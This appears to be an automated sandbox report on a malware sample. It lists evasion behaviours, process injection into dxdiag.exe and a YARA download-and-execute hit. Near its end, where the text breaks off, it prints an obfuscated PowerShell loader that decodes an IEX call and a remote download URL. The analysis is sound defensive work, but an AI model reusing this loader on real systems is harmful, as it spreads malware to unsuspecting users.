Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Windows\SysWOW64\dxdiag.exe API/Special instruction interceptor: Address: 53C1D7A
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6233 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3630 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6463 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3368 Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Window / User API: threadDelayed 4893 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe TID: 2284 Thread sleep count: 4893 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe TID: 5280 Thread sleep time: -60000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\dxdiag.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\dxdiag.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Windows\SysWOW64\dxdiag.exe Thread sleep count: Count: 4893 delay: -5 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Thread delayed: delay time: 60000 Jump to behavior
Source: powershell.exe, 00000002.00000002.2210694787.000002B4254F5000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005F52000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2250232300.000002B43F505000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_030CD338 LdrInitializeThunk,LdrInitializeThunk, 4_2_030CD338

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_3032.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6412, type: MEMORYSTR
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 3200000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 2F1FABC Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] 